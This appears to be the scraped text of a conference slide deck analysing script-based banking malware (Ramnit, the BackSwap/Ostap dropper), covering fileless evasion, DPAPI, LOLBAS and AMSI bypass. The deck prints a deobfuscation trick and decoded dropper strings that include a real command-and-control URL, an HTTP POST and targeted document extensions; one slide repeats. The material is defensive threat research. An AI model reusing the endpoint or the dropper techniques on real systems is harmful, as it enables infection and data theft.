  • 40. Why Script? ● Fileless malware = stealthier malware ○ Evades AVs scanner modules ● Suspicious activity is done from within a “legitimate” process
  • 42. Windows DPAPI (Data Protection API) ● Simple cryptographic API, since windows 2000 ● Enables symmetric encryption of any kind of data ● 2 different scopes (CurrentUser and LocalMachine) ● Sounds promising
  • 44. DPAPI mostly sounds promising ● In the words of Benjamin Delpy: “Friends don't let friends save passwords with DPAPI; You know it's ~like cleartext passwords?” ● Many applications use it for legit reasons, e.g. Chrome ● Has a decryptor written by Nirsoft mimikatz # coffee ( ( ) ) .______. | |] / `----'
  • 45. LOLBAS ● Living-Off-The-Land Binaries and Scripts (and also Libraries) ● Coined by Christopher Campbell & Matt Graeber ● Repo currently has 96 binaries
  • 46. AMSI Antimalware Scan Interface ● Part of Windows 10 ● interface standard that allows apps to integrate with antimalware products ● Bypassed few times, by CyberArk using memory patching
  • 47. Ramnit - Background ● Operating since 2010, taken down at 2015 ● New versions released ~weekly ● Camellia - Latest known financial module ● 100K Machines in two months ● HVNC, keylogger, screenlog, cookie-grabber, form-grabber, MITB injections and more
  • 48. It all starts with an “innocent looking” scheduled task It’s well known that every randomly generated name at the scheduled task list is legit
  • 52. The .txt file... … is exactly what you expect it to be - sh**
  • 54. The Smoking Gun # This is still GetProcAddress, but instead of PowerShell converting the string to a pointer, you must do it yourself This doesn't look like “yourself”, or really bad opsec Google yielded Invoke-ReflectivePEInjection.ps1
  • 60. Why Scripts? ● Multi-purpose ○ Decryption of .txt file ○ AMSI bypass ○ Code injection ● Ramnit’s Specialties ○ Multiple languages ○ Complex architecture
  • 62. BackSwap ● First spotted in March 2018 ● Polish targets → Spanish banks ● Simple yet pretty cool techniques for injection and credentials theft
  • 63. BackSwap is COOL ● Greatly detailed by Michal Poslusny & Peter Kalnai and Itay Cohen
  • 64. Once Upon a Time ● Fraud reported ● End-user shared the sample with us ● We got these:
  • 65. This is not a sample. ● What is it? ● Quick-and-dirty static analysis
  • 67. What are These? ● eight .jse files - JavaScript Encoded ● ScrDec to the rescue
  • 68. Only 60k * 8 = 480,000 LoCs to read
  • 69. Brief Look two unescape functions - called thousands of times function Sdercfgvbhyj(d, f) { return unescape(d); }; function Dertpolog(q, w, y) { return unescape(y); };
  • 70. Escape the unescape Let’s accumulate their return values accumulatedString = ‘’; function Sdercfgvbhyj(d, f) { accumulatedString += unescape(d); return unescape(d); }; function Dertpolog(q, w, y) { accumulatedString += unescape(d); return unescape(y); }; ... WScript.Echo(accumulatedString);
  • 71. Escape the unescape we got: c:UsersElizabethDesktop>cscript cert.js Microsoft (R) Windows Script Host Version 5.812 Copyright (C) Microsoft Corporation. All rights reserved. EnumeratorActiveXObjectWScriptScriptFullNameGetObjectScripting.FileSystemObjectC reateObjectWScript.ShellADODB.StreamShell.ApplicationMsxml2.ServerXMLHTTPfromCha rCodeExpandEnvironmentStrings%USERPROFILE%fromCharCodefromCharCodeExpandEnvironm entStrings%TEMP%floorrandomNameSpacecert.jse&pref=tysonhttps://185.209.160.50/ba tya1/footer.php?oxx=fo10MZPOSTSelfPath2050000-f -decode 4294967295Drives*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpdLafamiliaestodo.txt
  • 72. Escape the unescape we got: c:UsersElizabethDesktop>cscript cert.js Microsoft (R) Windows Script Host Version 5.812 Copyright (C) Microsoft Corporation. All rights reserved. EnumeratorActiveXObjectWScriptScriptFullNameGetObjectScripting.FileSystemObjectC reateObjectWScript.ShellADODB.StreamShell.ApplicationMsxml2.ServerXMLHTTPfromCha rCodeExpandEnvironmentStrings%USERPROFILE%fromCharCodefromCharCodeExpandEnvironm entStrings%TEMP%floorrandomNameSpacecert.jse&pref=tysonhttps://185.209.160.50/ba tya1/footer.php?oxx=fo10MZPOSTSelfPath2050000-f -decode 4294967295Drives*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpdLafamiliaestodo.txt
  • 73. Wrapping Up ● This is actually the BackSwap dropper, dubbed Ostap1 or Nemucod ● BackSwap recently moved to Powershell instead of JSE2 [1] Ostap analysis by Cert.pl [2] CheckPoint Research tweet
  • 75. CONclusions ● Bankers tend to move functionality from binaries to scripts ○ Infection (download) ○ Execution ○ Encryption ● Why? ○ AV evasion ○ Laziness ○ It works